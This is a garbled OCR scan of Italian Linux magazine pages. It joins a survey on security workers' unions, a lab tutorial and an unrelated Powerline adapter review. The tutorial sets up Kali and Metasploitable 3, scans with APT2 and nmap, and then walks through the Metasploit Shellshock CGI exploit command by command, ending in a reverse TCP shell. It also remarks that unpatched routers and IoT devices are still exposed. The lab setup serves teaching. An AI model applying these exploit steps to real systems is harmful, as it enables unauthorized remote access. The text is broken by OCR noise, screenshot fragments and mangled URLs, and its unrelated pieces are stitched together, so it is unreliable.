Le persone che si occupano di sicurezza informatica de- 
vono la loro preparazione in buona parte all'autodidattica. 
Una minore parte è dovuta alle competenze apprese nella 
scuola dell'obbligo, e solo in minima parte l'università e 


i corsi online si sono rivelati utili per apprendere nozioni 
utili al proprio lavoro. Questo è probabilmente dovuto an- 
che al fatto che in Italia non esiste un dipartimento univer- 
sitario per chi voglia occuparsi di sicurezza informatica, e 
che in generale il nostro sistema scolastico è carente dal 
punto di vista dell'insegnamento dell’informatica. 


| Mo 


| i 


Btdri82s 


tir 26.38 


orso 


È 
i 


delle tutele dei lavoratori della sicurez- | 


| SI SENTE 
i LA MANCANZA 
i DI UN SINDACATO? 


| I lavoratori dell'informatica si trova- 

no spesso in quella sorta di limbo dei 

I diritti del lavoro, per cui sono trattati 

i di fatto come dipendenti di aziende, ma 
i vengono considerati dei “liberi profes- 

i sionisti” sulla carta, e quindi non hanno 
| una rappresentanza sindacale. Consi- 

| derando che l'informatica è il “mestie- 

| re” del futuro, è preoccupante pensare 
i che la maggioranza della forza lavoro 

I potrebbe trovarsi senza una rappre- 
sentanza e quindi senza la possibilità di 
| far valere i propri diritti. Tutte le classi 
di età dei lavoratori della sicurezza 

| informatica ritengono importante la 

| costituzione di un sindacato per gli 

i informatici. Ma è interessante notare 

i la distribuzione dei “no” nelle varie 

I classi: i più contrari all'esistenza di un 

| sindacato sono i lavoratori tra i 26 e i 50 
| anni. Invece chi ha tra i 18 e i 25 anni, 

I oppure oltre i 50 anni, è generalmente 

| più favorevole all'esistenza di un sinda- 
| cato. Lo si può spiegare considerando 

I la preoccupazione pensionistica: i più 

| anziani sono preoccupati dalla possibile 
I modifica di leggi che possano allonta- 
nare il proprio pensionamento, mentre 
| i più giovani sono preoccupati dalla 

i possibilità di non veder proprio arrivare 
la propria pensione. La fascia lavorativa 
| intermedia è probabilmente preoccu- 

| pata dal fatto che un sindacato possa 

| mettere in fuga le aziende e ridurre la 

i probabilità di trovare lavoro. 
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KALI: IL SISTEMA PERFETTO PER PEN TESTER 


Il lato A del DVD allegato a GNU/Linux Magazine 195 contiene una macchina 


virtuale con Kali preinstallato e configurato per essere pronto all'uso. Con que- 
sta macchina si può immediatamente provare il tutorial sul bug Shellshock. IL... 
nome utente predefinito è root, e la password è kali. Ovviamente, essendo una 
password molto semplice è una buona idea evitare di esporre questa macchina 
virtuale (e a maggior ragione quella di Metasploitable) al di fuori della propria 
rete locale. Anche Kali è infatti abbastanza insicura, perché non è progettata 
per essere una distribuzione con cui svolgere il comune lavoro di tutti i giorni. 
Chi non vuole usare la macchina virtuale preconfezionata può ovviamente 
crearne una scaricando l’immagine del DVD ufficiale di Kali. Kali offre in realtà 
varie versioni, tutte reperibili nel sito Attp:/bit.ly/scaricakali. Noi ci baseremo 


file Modifica Visualizza Vai Strumenti. Impostazioni | Aiuto 


<y 


i BE BI sistemioperativi 


Fnsente 3 PACKARDEELL > LUCA_IN-ATTESA > sistemioperativi 

Today 

Yesterday 

BH) This Month e” Cl 

}9j Last Month a 

kafi-linux:20193- Ralivali 
amdbdiiso 


Cerca 


E Documenti 
&) Immagini 
#9 Audio Files 
H Video 


LE 
‘0 fisso da 109,9 GB 
E} Disca fisso da 732,4 GIE 
Disco fisso da 87,2 GIB 


sulla versione ufficiale, che dispone dell'interfaccia GNOME, ma è possibile 


usare anche l'edizione con il desktop KDE Plasma o LXDE. Al di là dell’inter- 


faccia, i programmi e gli script disponibili sono sempre gli stessi. 


Kalidinu=2019,3- 
amessiso 


(I PACKARORELL s 
13 Disco ss da 109,9. Nome e sistema operativo EirI 
DI Disco fisso da 7AZA GB senti globali. 
{3 Disco fisso da 37,2 GE Scegli un nome descrittivo par fs nuova macchina virtuale & 

seleziona i tipo Gi sistema operativo che desideri matallare. 3 T 
nome che scegli sarà volizzato da Virmalox jr iMentiticane smeonemegg 
quest cchia I 


Nome; Litati 


NUOVA MACCHINA 


Per creare una nuova macchina virtuale in Virtual- 
Box basta cliccare sul pulsante Nuovo. Si aprirà 
una procedura guidata. Per Kali, il tipo di sistema operativo 


è Linux e la versione Ubuntu (64 bit). 


Live Camd64) 
Î fail 


IL DISCO DI KALI 


Alla macchina va poi assegnato, come disco otti- 
co virtuale, l'immagine ufficiale di Kali, che si può 
scaricare dal sito http:/bit.Iy/scaricakali. Avviata la macchina, 


si può selezionare l'opzione Graphical install. 
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Col comando VboxManage si può aumentare la 
dimensione di un disco virtuale 


c RIE 1 saremoprrome © 


È PRCRARIIIFA > STA BRATIISA > sfera 


SCHEDA BRIDGE 
0 Basta seguire la procedura guidata, creando un nuovo di- 
sco virtuale da almeno 20GB. Creata la macchina, si devono 
aprire le sue impostazioni e, nella scheda Rete, selezionare la modalità 
Scheda con bridge, relativa alla scheda di rete usata dal computer host. 


‘i Icelandic - islenska 
‘| Indonesian - Bahasa Indonesia x 
Irish - Gaeilge 


Italiano 


Japanese 
i] Kannada 


‘| Kazakh 
Khmer 


ii Korean 
‘| Kurdish 


LINGUA ITALIANA 

0 La prima informazione richiesta dal wizard di instal- 
lazione è la lingua: è importante selezionare l'italiano, 
così da procedere poi anche a configurare la tastiera con il layout 
italiano. Per il resto, conviene accettare le opzioni predefinite. 


Configurare Kali per il primo avvio 


Assicuriamoci che Kali sia configurato in modo da essere pronto per il nostro tutorial 


Una buona password contiene una combinazione di lettere, numeri e segni di interpunzione e deve 
essere cambiata a intervalli regolari. 


L'utente root non dovrebbe avere una password nulla, Lasciando questo campo vuoto l'account root 
| viene disabilitato e vengono concessi i privilegi di super utente attraverso l'uso del comando «sudo» 
all'account di sistema iniziale. 


Tenere presente che non sarà possibile vedere la password mentre viene digitata. 
[loose È 
{) Mostra password 
Inserire nuovamente la stessa password di root per verificare che sia stata digitata correttamente. 
Inserire nuovamente la password per verifica: 


{cose 


Mostra password 


NOME E PASSWORD 
0 1 È importante impostare una password per l'utente root, 
con cui fare il login. Non è fondamentale che la pas- 
sword sia sicura, del resto questa macchina serve solo per esperi- 
menti e non dovrà mai essere usata per trattare dati sensibili. 


Configurazione del gestore pacchetti 


È possibile usare un mirror di rete come supplemento al software incluso nel CD-ROM. Questo può servire 
‘ a rendere disponibili versioni più aggiornate del software. 


| Usare un mirror di rete? 


AGGIORNAMENTI? NO 
0 La procedura guidata chiede se si voglia utilizzare 
un mirror di rete, cioè i repository, per installare 
gli aggiornamenti subito dopo la copia dei file del sistema. 
Conviene rispondere No, perché questo meccanismo non 
funziona bene e a volte blocca l'installazione. 


root@kali: + 
File Modifica Visualizza Cerca Terminale Aiuto 
/etc/apt/sources,list 


GNU nano 4,3 


REPOSITORY ATTIVI 
0 Al primo avvio di Kali i repository sono disabilita- 
ti: bisogna dare il comando sudo nano /etc/apt/ 
souces.list e togliere il simbolo # davanti le righe del server 
kali.org, salvando con Ctrl+O. L'indice dei pacchetti va poi 
aggiornato con sudo apt-get update. 


Partizionamento dei dischi 


I 
i 
ni 
i 


IL programma d'installazione può guidare nel partizionare un disco 0, se si preferisce, è possibile 
procedere manualmente, Anche usando la procedura guidata si potranno successivamente vedere i 
risultati e adattarli alle proprie esigenze. 


Scegliendo il partizionamento guidato per l'intero disco, sarà chiesto il disco da usare. 
Metodo di partizionamento: 


| Guidato - usa l'intero disco e imposta LVM i 
| Guidato - usa l'intero disco e imposta LVM cifrato 


PARTIZIONI GUIDATE 
02 Per il partizionamento conviene lasciare che l'algorit- 
mo automatico faccia tutto da solo, usando quindi il me- 
todo Guidato. Sono necessarie varie conferme, prima di scrivere 
davvero le modifiche sul disco. 


Installare il boot loader GRUB su un disco fisso 

Sembra che î uesta nuova Installazione sia l'unico sistema operativo presente su questo computer Se 
così fosse, è buona norma installare il boot loader GRUB sul master boot record del primo disco fisso. 
Attenzione: se il programma d'installazione non riesce a riconoscere un altro sistema operativo presente 


su questo computer, la modifica del master boot record renderà il sistema operativo temporaneamente 
| non avviabile, sebbene GRUB possa essere configurato successivamente per avviarlo. 


Installare il boot loader GRUS nel master boot record? 
© No 
@Sì 


BOOT LOADER GRUB 
04 L'ultimo passaggio del wizard consiste nell’instal- 
lare il boot loader sul disco rigido: basta risponde- 
re Si e in breve l'installazione è conclusa. Poi bisogna riav- 
viare la macchina, per il primo avvio del sistema installato 
sul disco virtuale. 


root@kali: » 


Modifica Visualizza Cerca Terminale. Aiuto 
Azioni Annulla Pacchetto  Risolutore Cerca Opzioni Viste Aiuto 
©-T: Menu 7: Help q: Quit du: Update gQ: Preview/Dawnioad/Install/Remove Pkgs 
aptitude 0.838,12 @ kali Disk: +41,8 MB DL:.7.9480kB 


INSTALLIAMO APT2 
06 Si può poi utilizzare il gestore dei pacchetti (sy- 
naptic o aptitude) per installare il programma 
apt2 per il penetration testing “automatico”. 
Dal terminale basta il comando sudo apt-get install 


apt2. 
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METASPLOITABLE 3 


Metasploitable è una macchina virtuale 
volutamente ricca di bug giunta alla sua 
terza versione e prodotta da Rapid7, la 
stessa azienda che si occupa della suite 
Metasploit. In questa terza versione 
sono in realtà disponibili due diffe- 
renti macchine virtuali: una realizzata 
sulla base di Ubuntu 14.04, e l'altra su 
Windows Server 2008. Sono due sistemi 
operativi che hanno da poco tempo 
concluso il loro ciclo di vita, ma sono in 
realtà ancora usati da alcune aziende 
che non si sono volute aggiornare per 


28 Segnalibri Impostazioni | Aiuto 


un motivo o per l’altro. Rappresentano 
quindi un target perfetto per provare a 
individuare delle vulnerabilità realmen- 
te in circolazione sui sistemi operativi 
non aggiornati che si possono tutt'ora 
trovare con una scansione di internet. È 
anche una ottima occasione per testare 
le vulnerabilità di un sistema Windows 
senza dover comprare una licenza. 


LE VIRTUAL MACHINE 
CHE TROVI NEL DVD 


Nel DVD allegato alla rivista abbiamo 
incluso la macchina virtuale con Ubuntu 


File Modifica Visualizza Segnalibri Impostazioni Aiuto 


pronta all'uso: il nome utente e la 
password sono vagrant. Basta estrarre 
i file dall'archivio e importare nella 
propria installazione di VirtualBox la 
macchina virtuale. Si può anche creare 
una nuova macchina virtuale e utilizzare 
solo il disco virtuale (il file VDI) estratto 
dall'archivio. 

Chi volesse fare tutto da solo e ottenere 
le versione più recente possibile, oltre a 
quella con Windows, deve solo seguire 
il nostro tutorial sull'installazione delle 
macchine Metasploitable attraverso Va- 
grant, presente in queste stesse pagine. 


16 


Per poter recuperare le ultime immagini di Meta- 

sploitable bisogna scaricare Vagrant dal sito uffi- 
ciale: Attp:/bit.ly/vagrantupdownload. Sono disponibili pacchet- 
ti per sistemi Deb, Rpm, e per Arch Linux. 


Dando il comando vagrant up inizia la procedura au- 

tomatica di download e configurazione delle macchine 
virtuali. La procedura farà apparire in VirtualBox due nuove mac- 
chine: una con Ubuntu 14.04 e una con Windows Server 2008. 
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Installato Vagrant, bisogna scaricare in una car- 
tella il file che definisce le macchine virtuali di Me- 
tasploitable. Lo si può fare con il comando curl -O htips://raw, 
githubusercontent.com/rapid7/metasploitable3/master/Vagrantfile 


t 
f 
È 


£ 
1} 8 


} 


j 
FALLI 


IRR} 
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Dopo la creazione delle macchine virtuali, conviene 

modificare le loro impostazioni per assicurarsi che la 
rete sia nella modalità Scheda con bridge, così si possono tenta- 
re attacchi da qualsiasi dispositivo della propria rete locale. 


Lanciare una scansione con APT2 


Proviamo il kit di Pen Testing Automatico sperimentale 


Applicazioni .— Posizioni mE) Terminale * dom 20:38 


root@kali: + 


Fite Modifica Visualizza Cerca Terminale Aiuto 
tart 


Prima di tutto è necessario caricare il database di 
Metasploit: lo si può fare aprendo un terminale e 
dando il comando msfdb start. Il caricamento richiede alcu- 


ni secondi, poi ritorna il prompt. 


File Modifica . Visualizza. Cerca Terminale Aiuto 


-x *load msgrpc User=msf Pas s ServerPort=55552 


support: No database YAML file 


Si deve poi lanciare la console di Metasploit, at- 

tivando il plugin msgrpc. Si può fare tutto in un 
unico comando: msfconsole -q -x 'load msgrpc User=msf 
Pass=msfpass ServerPort=55552' 


ating Reports 


Good Bye! 


Ora ci serve un'altra scheda del terminale 

(Ctrl+Shift+T). In questa possiamo lanciare il pro- 
gramma apt2 col comando apt2 -s 0 --target 192.168.1.94, 
dove 192.168.1.94 è l'indirizzo IP della macchina virtuale di 
Metasploitable3. 


This is a summary of everything 


» NMAP Scan 
© Scan Type: S 
o Scan Flags: A 
© Port Range: 1-1024 
© Target: 192.168.1.94 
* Hosts Found: 2 
a Services Found: 0 
* Vulnerabilities Found: 0 


Aprendo il file del report nel browser Firefox si 

può vedere un riassunto dei dati estrapolati da 
APT2. Tuttavia, essendo un progetto in continua evoluzione, 
spesso non funziona correttamente e segnala la presenza di 
zero vulnerabilità anche se non è vero. 


Per conoscere l'indirizzo IP di Metasploitable ba- 

sta fare il login e digitare ifconfig. Oppure, si può 
lanciare apt2 sull'intera rete locale usando 192.168.1.1/24. 
Quando lo script termina, produce un report indicando sul 
terminale il suo percorso. 


Gi ioni i ione DI! 15 scasimmo ara0i È 


eci mattrubran 
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Rileggendo l'output su terminale di APT2 si pos- 

sono vedere le varie vulnerabilità riscontrate, e 
anche capire quali parti del programma abbiano avuto dei 
problemi. Poi basta guardare il contenuto della cartella / 
root/.apt/proofs/ per leggere tutti i dati ottenuti. 
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CHE COS'È 
SHELLSHOCK? 


Quando si analizzano i risultati di una 
scansione di Nmap si possono trovare in- 
formazioni utili per capire quali potenziali 
vulnerabilità si nascondono su un sistema. 
Per esempio, considerando la versione 

di OpenSSH installata sul sistema si può 
capire a quando risalga l'ultimo aggiorna- 
mento e quindi se ci siano bug particolar- 


GNU/Linux, e colpisce ogni sistema non 
aggiornato dopo settembre 2014. Che sem- 
bra strano, ma ce ne sono diversi in circo- 
lazione, soprattutto su dispositivi che non 
vengono aggiornati automaticamente come 
router e sistemi loT. Quando si trova un si- 
stema operativo molto vecchio, Shellshock 
è una “garanzia” per un attacco di succes- 
so. Esistono vari metodi per sfruttarlo, a 
seconda di come lo si vuole innescare: si 


modo. Il metodo più semplice è sfruttare 
un eventuale script CGI, se presente nella 
cartella del server web. Metasploitable 

ha proprio uno di questi script, chiamato 
hello_world.sh. Lo script di per sé non è un 
problema, è un semplicissimo codice Bash 
che si limita a scrivere “Hello, World!” 
sulla pagina web. Ma per la sua esecuzione 
è richiesto Bash, e questo offre la possibi- 


mente famosi. Per esempio, Shellshock. Si 
tratta di uno dei bug più famosi su sistemi 


‘ NMAP-nmapScan192.16..1.94-2jdwebzfru.nmap x È 


# Nmap 7.80 scan initiated Mon Nov 18 17:18:48 2019 as: /usr/bin/nmap -sS -A -p È 
1-1024 -oA /root/.apt2/proofs/NMAP-nmapScan192.168.1.94-zjdwebzfru 192.168,1.94 È 
|Nmap scan report for metasploitable3-ub1404,lan (192,168.1.94) 

iHost is up (0.00073s latency). 

Not shown: 1019 filtered ports 

PORT STATE SERVICE VERSION 

21/tcp open ftp ProFTPD 1.3.5 

22/tcp DRIMIESSINSESEST)! Ubuntu 2ubuntu2.10 (Ubuntu Linux; 
protocol 2.0) 

Il ssh-hostkey: 

il 1024 b9:07:bc:1e:21:f8:aa:09:7a:f3:66:c9:4c:1e:93:82 (DSA) 
|| = 2048 41:1c:56:9 : 

{] 256 6f:3a:67:21 1:f3:f2:33:58:ba:ea:17:0f (ECDSA) 
Il 


256 31:0c:79:ba:be:a8:ef:8f:0a:f6:bb:45:70:97:b3:9b (ED25519) 
80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 
| http-ls: Volume / 
{ SIZE TIME 
4 - 2018-07-29 13:18 chat/ 
4 - 2011-07-27 20:17 drupal/ 
|| 1.7K 2018-07-29 13:18 payroll app.php 
Il - 
I 


FILENAME 


2013-04-08 12:06 phpmyadmin/ 


Tra i file prodotti da APT2 ci sono anche le scan- 

sioni di nmap (che si possono ottenere anche con 
nmap -A indirizzoIP). Leggendone una si può scoprire, per 
esempio, che la macchina attaccata dispone di una versione 
di Apache vulnerabile a Shellshock. 


3Kom SuperHack II Logon 


Da notare che questo particolare attacco funziona solo se 

si trova un file eseguito nella shell. Per iniziare l'attacco 
bisogna lanciare la console di metasploit: basta ilsemplice comando 
msfconsole. Sarà necessario qualche minuto per il caricamento. 
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tratta di un bug della shell Bash, quindi 
è necessario lanciare la shell in qualche 


lità di usare il bug a proprio vantaggio, per 
eseguire codice sul sistema vulnerabile e 
ottenere un terminale remoto. 


® HowtoInstaliG 


Hello World! 


Si scopre che il server ha una cartella cgi-bin, che 

contiene uno script shell. Il percorso completo, 
raggiungibile da un browser, è /cgi-bin/hello_world.sh. In 
una situazione reale si potrebbe fare un brute force per tro- 
vare i nomi dei file. 


Per trovare i vari exploit disponibili, si può usare 

il comando search shellshock. Visto che voglia- 
mo sfruttare l'attacco tramite CGI, cerchiamo la posizione 
dell'exploit relativo alla mod_cgi di Apache. 


L’attacco Shellshock 


Otteniamo una shell remota grazie al bug Shellshock 


fBot IRC Bot Remote 
inction_roc 
ation via 


normal 
ironment Code In] 


Per caricare l'exploit relativo a Shellshock trami- 

te CGI bisogna dare il comando use exploit/multi/ 
http/apache_mod_cgi bash_env_exec. Possiamo vedere 
le sue opzioni digitando show options. 


normal 
normal 
normal 
normal 
norm 


LU bind t normal 


, Bind TCP 
normal 


normal 


normal 


Dobbiamo scegliere uno shellcode da eseguire sul si- 

stema vulnerabile: il comando show payloads pre- 
senta tutti gli shellcode disponibili. Possiamo usare il classico 
reverse TCP con set payload linux/x86/shell/reverse_tcp. 


Payload options (linux/x86/she 


e tcp): 


Description 


listen address (an interfda 


ified) 


LPORT 4444 The listen port 


od cai bash env exec) > check 
192.168.1.94:80 - The target is vulnerable. 


msf5 exploit(multi/http/apache mod cgi bash env_ exec) > | 


msf5 exploit({multi/http/apac 


Prima di lanciare l'attacco, verifichiamo se la mac- 

china “vittima” soffra davvero del bug, col coman- 
do check. Se la risposta è positiva, possiamo finalmente ini- 
ziare l'attacco col comando exploit. 


HTTP server virtual host 


Exploit target: 


Id Name 


> set rhost 192.168.1.94 
168.1.94 
gi-bin/he 


/cgi-bin/hell 
ploit(multti/kbttp/apac 


I due parametri fondamentali da impostare sono 
l'IP della vittima (la macchina Metasploitable) e il 
percorso dello script vulnerabile. Basta usare i comandi set 
rhosts 192.168.1.94 e set targeturi /cgi-bin/hello_world.sh. 


normal 
normal 
normal 
normal 
normal 


normal 


it(multi/http/ap linux/x86/she 


tep 


bash _env_exec) > set lhost 192.168.1.91 
192.1 1.91 


it(mutti/bttp/apache mod cgi nv_exec) 


Per sicurezza impostiamo anche la variabile Ihost, 

che indica la macchina su cui è installato Kali, così 
possiamo ottenere una reverse shell. Basta dare un coman- 
do del tipo set Ihost 192.168.1.91. 


exec) > check 
is vulnerable. 
gi bash _env.iexec) > exploit 


} 
1.94 


2.168.1.91:4444 -> 192.168.1.94:51826) : 


3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:1 
GNU/Linux 


Se tutto è andato "bene", abbiamo ottenuto un ter- 
minale remoto con cui eseguire comandi sulla mac- 
china vulnerabile. Per esserne certi possiamo dare il comando 
uname -a, verificando che il nome sia metasploitable3-ub1404. 
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La potenza 
corre sul fili 


Gli adattatori Powerline consentono 
di navigare in Internet attraverso 
la rete elettrica. Quali dispositivi 
dotati di connessione WLAN si sono“ 
rivelati convincenti nel test? 


Quando la connessione WLAN 
del router tende a diventare de- 
bole, occorrerà prendere prov- 
vedimenti per renderla più effi- 
ciente e aumentarne la portata. 
Vengono ormai impiegati corren- 
temente i cosiddetti ripetitori 
(“Amplificatori della connessio- 
ne WLAN”), che provvedono a 
trasferire i dati tra il dispositivo fi- 
nale e il router. Esiste però un 
problema, poiché sulle grandi di- 
stanze, dove possono essere 
presenti pareti in cemento arma- 
to, questi ripetitori raggiungono 
il loro limite di portata, mentre gli 
adattatori Powerline non incon- 
trano alcuna difficoltà, poiché in 
grado di trasferire dati a velocità 
elevatissima attraverso la linea 
elettrica. Anche questa tecnolo- 
gia non è però ancora perfetta, 
come mostrato dal test effettua- 
to su otto adattatori Powerline. 


COME 
FUNZIONANO LE 
POWERLINE? 


Un set Powerline è costituito da 
almeno due adattatori, di cui uno 
è inserito in una presa elettrica a 
muro vicino al router e collegato 
ad esso attraverso un cavo di re- 
te LAN. Ulteriori adattatori po- 
tranno essere inseriti in altre pre- 
se presenti nell’abitazione. Attra- 
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% | set di adattatori Powerline 
sono composti da almeno due 
adattatori. 

Itprimo adattatore viene 
collegato al router attraverso un 
cavo di rete LAN EB. 

Ulteriori adattatori potranno 
essere sistemati a piacere 
all'interno della casa 0 
dell'appartamento IS. Gli altri 
adattatori si collegano con il 
primo adattatore e provvedono a 
inviare dati via cavo o WLAN EB 
ai dispositivi finali. 


Abbrechen  Verbinden 


23456789 0 
ti-% 
> 


verso le prese viene stabilito un 
collegamento con il primo adat- 
tatore e i dati vengono trasferiti 
utilizzando la linea elettrica. A se- 
conda del modello, gli adattato- 
ri non dispongono solo di porte 
LAN, ma possono funzionare an- 
che a onde radio via WLAN, per 
poter consentire, ad esempio, a 
notebook o tablet di navigare in 
Internet. 


TUTTI GLI 

ADATTATORI SONO 
COMPATIBILI? 
No. La maggior parte degli adat- 
tatori utilizza lo standard Home- 
plug AV. | dispositivi di produtto- 
ri diversi e con differenti classi di 
velocità possono però essere 
collegati tra di loro, ma i modelli 
più lenti tendono a rallentare gli 
adattatori più veloci. | nuovi di- 
spositivi Devolo della serie Ma- 
gic, anziché lo standard Home- 
plug AV, utilizzano il nuovissimo 
chip con standard G.hn che, pur 


fornendo una velocità più eleva- 
ta, rende gli adattatori incompa- 
tibili con le prese Homeplug, di 
cui fanno parte anche i disposi- 
tivi ALAN di vecchia generazio- 
ne di Devolo (vedi grafico). Gli 
adattatori G.hn e Homeplug pos- 
sono gestire in parallelo due reti 
separate tra di loro, ma tendono 
a generare interferenze e non ri- 
escono quindi a offrire la loro ve- 
locità massima. 


QUANTO SONO 
VELOCI 

LE POWERLINE? 

Anche se i produttori tendono a 
pubblicizzare i propri dispositivi 
evidenziando velocità per trasfe- 
rimento dati fino a 2.400 Megabit 
al secondo (Mbps), nelle prove la 
velocità attraverso le prese elet- 
triche non ha mai raggiunto que- 
sti valori. L’adattatore più veloce 
in standard Homeplug AV (TP- 
Link TL-WPA8630P) ha offerto ve- 
locità fino a 467 Mbps, mentre il 
Devolo Magic 2 WiFi ha raggiun- 
to i 686 Mbps, grazie ai nuovi chip 
G.Hn. Fastidioso che nel model- 
lo Devolo Magic 1 dotato di chip 
G.hn, Devolo corredi questo di- 
spositivo di una porta LAN da 100 
Mbps. Chidispone di una con- 
nessione Internet più veloce, non 
potrà sfruttare pienamente tutto il 
suo potenziale. Sorprendente che 
la coppia di adattatori D-Link 
DHP-W611AV, pur costando cir- 
ca 92 euro, abbia fornito nelle pro- 
ve un’elevata velocità per il trasfe- 
rimento dati via Powerline, rag- 
giungendo il valore di 420 Mbps. 
Nell’uso pratico, queste velocità 
riscontrate nel test sono difficil- 
mente raggiungibili, poiché a se- 
conda del tipo di appartamento, 
numerosi fattori possono rallenta- 
re enormemente il funzionamen- 
to degli adattatori Powerline. Un 
problema è rappresentato dalla 
distanza, poiché se i dati devono 
percorrere una distanza notevole 
attraverso la linea elettrica, la ve- 
locità di trasferimento viene pena- 
lizzata. Inoltre, se alla linea elettri- 
ca sono collegati numerosi dispo- 
sitivi, non sarà possibile a volte 
sfruttare appieno una connessio- 
ne ADSL a 100 Mbit. Nelle prove, 
ad esempio, la presenza di due 
alimentatori per smartphone, due 
lampade da scrivania e un router, 
hanno fatto diminuire la velocità 
del 60 percento. 


CHI OFFRE LA 
MIGLIORE WLAN? 


Relativamente alla velocità degli 
adattatori Powerline, il modello 
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di AVM Fritz Powerline 1260E 
non si avvicina minimamente ai 
modelli top di gamma di Devolo, 
TP-Link e D-Link. Per quanto ri- 
guarda invece la connessione 
WLAN, l’adattatore del produt- 
tore di Fritzbox è in grado di mo- 
strare tutti i propri muscoli: Attra- 
verso la WLAN-ac (con banda di 
frequenza a 5 Gigahertz), l’adat- 
tatore 1260E ha offerto velocità 
fino a 646 Mbps e anche nel 
punto di misurazione più lonta- 
no, la velocità rilevata è stata di 
261 Mbps. Per confronto: il De- 
volo dLAN 1200+ WiFi-ac un po’ 
antiquato, ha raggiunto la velo- 
cità di 325 Mbps nell’area circo- 
stante al punto di misurazione e 
116 Mbps nel punto più lontano. 
Con il vecchio standard “n” (2,4 
Gigahertz) TP-Link si è distinto 
offrendo velocità per trasferi- 
mento dati fino a 297 Mbps. La 
velocità della WLAN del costoso 
Devolo Magic 2 WiFi, pur essen- 
do come si deve, non ha rag- 
giunto livelli al top. L’economico 
Devolo dLAN 550+ WiFi è inve- 
ce in grado di trasferire dati via 
onde radio solo sfruttando la so- 
vraccarica banda da 2,4 Gi- 
gahertz e, quindi, chi possiede 
uno smartphone abbastanza at- 
tuale, un notebook o un tablet, è 
consigliabile che acquisti un 
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adattatore che possa sfruttare 
anche la banda a 5 Gigahertz. 
Una velocità elevata non dipen- 
de solo dai chip, ma si rivelano 
significative anche le funzioni per 
ottimizzare la WLAN, tra cui la 
più importante si rivela il Band 
Steering, che consente all’adat- 
tatore di impostare automatica- 
mente per il dispositivo finale, la 
banda di frequenza più veloce in 
quel momento. | candidati al test 
di AVM e Devolo (tranne il ALAN 
550+ WiFi) sono in grado di of- 
frire questa funzione, mentre i di- 
spositivi di Asus, TP-Link e D- 
Link ne sono purtroppo privi. 


COSA OFFRE 

LA RETE MESH? 
Con una rete Mesh, gli adattato- 
ri sono profondamente intercon- 
nessi e consentono l’attuazione 
di nuove funzioni. Se, ad esem- 
pio, l'utente si sposta con il pro- 
prio smartphone all’interno del- 
la propria abitazione, gli adatta- 
tori, in condizioni ideali, provve- 


> wr; Rete osgii 


Configurazione 


Ho ze a ipa meta. pin stia 7 WA mn Ra 


deranno a impostare per lo 
smartphone il punto di accesso 
ottimale, senza interrompere il 
collegamento. AVM chiama “Ac- 
cess Point Steering” questa fun- 
zione Mesh, mentre Devolo la 
denomina Fast Roaming. Con 
adattatori privi di tecnologia 
Mesh può succedere che, se 
l'utente si trova in mansarda, lo 
smartphone rimanga collegato 
alla WLAN dell’adattatore pre- 
sente al piano terra che rilascia 
un segnale modesto, malgrado 
in mansarda sia sistemato un 
adattatore nella presa elettrica, 
in grado di offrire un segnale di 
rete migliore. | dispositivi Devo- 
lo Magic escono dalla fabbrica 
già con la funzione Mesh integra- 
ta, ma per gli adattatori ALAN di 
passata generazione è già dispo- 
nibile un update. L’AVM Fritz Po- 
werline 1260E offre la funzione 
di Access Point Steering con la 
versione attuale 7.10 del sistema 
operativo Fritz OS. 


QUANTO È 
SEMPLICE 
L'USABILITÀ? 


Ottimo che la configurazione di 
tutti gli adattatori sia semplicis- 
sima. Numerosi set sono già “ac- 
coppiati” dal produttore e dopo 
essere stati inseriti nella presa 


elettrica si collegano subito tra di 
loro. Se tutto questo non avvie- 
ne, basterà premere brevemen- 
te un tasto su entrambi i dispo- 
sitivi, affinché venga impostata 
una password per consentire il 
collegamento. Tutti i candidati al 
test possono essere gestiti con- 
sultando le pagine delle imposta- 
zioni attraverso il browser. Con il 
Devolo, per accedere a queste 
pagine, l’utente dovrà digitare 
l'indirizzo IP dell’adattatore nel- 
la barra degli indirizzi oppure ri- 
correre al software “Devolo 
Cockpit”, scaricabile anche per 
GNU/Linux dalla homepage del 
produttore. Con tutti gli altri adat- 
tatori testati l'operazione è anco- 
ra più semplice, poiché basterà 
digitare un indirizzo fisso (ad 
esempio Atip://fritz.powerline per 
AVM. TP-Link e Devolo offrono 
in alternativa delle App per An- 
droid e iPhone, ma che si rivela- 
no però poco chiare. 


VELOCITÀ CON UNA TRASMISSIONE DATI DISTURBATA 


In condizioni ottimali, gli adattatori Powerline sono oggi in grado di offrire velocità fino a quasi 700 Mbps. 
Se però alcuni elettrodomestici sfruttano la stessa linea elettrica, la velocità tende a diminuire, anche in 


condizioni ideali. 


Devolo AVM 


Magic2 WiFi Fritz Powerline 1260E 
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TP-Link 
TL-WPA8630P 


Devolo 
dLAN 1200+ WiFi ac 


G Condizioni ideali o] Condizioni anomale 


D-Link 
DHP-W611AV 


Asus 
PL-AC56 


Mbps 


93 93 95 95 
Mbps Mbps Mbps 


Devolo 
dLAN 550+ WiFi 


Devolo 
Magic1 WiFi 


ABBINAMENTI 
PERFETTI 


PL-AC56 
(1200 MBPS) 


ASUS 
PL-AC56 
(1200 MBPS) 


AVM 

FRITZ POWER- 
LINE 1260E 
{1200 MBPS) 


DEVOLO 
DLAN 550+ 


WIFI 
(500 MBPS) 


DEVOLO 
DLAN 1200+ 
WIFI AC 
(1200 MBPS) 


DEVOLO 
MAGIC 1 WIFI 
(1200 MBPS) 


DEVOLO 
MAGIC 2 WIFI 
(2400 MBPS) 


D-LINK 
DHP-W611AV 
(1000 MBPS) 


TP-LINK 
TL-WPA8630P 
(1300 MBPS) 


QUALE 

MODELLO OFFRE 
NUMEROSE 
FUNZIONI EXTRA? 
Chi utilizza il Fritz Powerline 
1260E con un router AVM at- 
tuale, come il Fritz Box 7590, 
verrà a godere di numerose 
funzioni. Premendo il tasto 
Connect, sarà possibile trasfe- 
rire numerose impostazioni del 
Fritz Box all’adattatore Power- 
line e, tra queste, anche tutte 
le configurazioni dell’esteso 
controllo parentale offerto dal 
router: ottimo! Inoltre, il Fritz 
Powerline 1260E può essere 
gestito e aggiornato tramite la 
LAN domestica del Fritz Box. 


AVM DEVOLO 
FRITZ POWER-LI- | DLAN 550+ 
NE 1260E WIFI 

(1200 MBPS) | (500 MBPS) 


DEVOLO 
DLAN 1200+ 
WIFI AC 
(1200 MBPS) 


DEVOLO 
MAGIC 1 WIFI 
(1200 MBPS) 


DEVOLO 
MAGIC 2 WIFI 
(2400 MBPS) 


D-LINK 
DHP-W611AV 
(1000 MBPS) 


TP-LINK 
TL-WPA8630P 
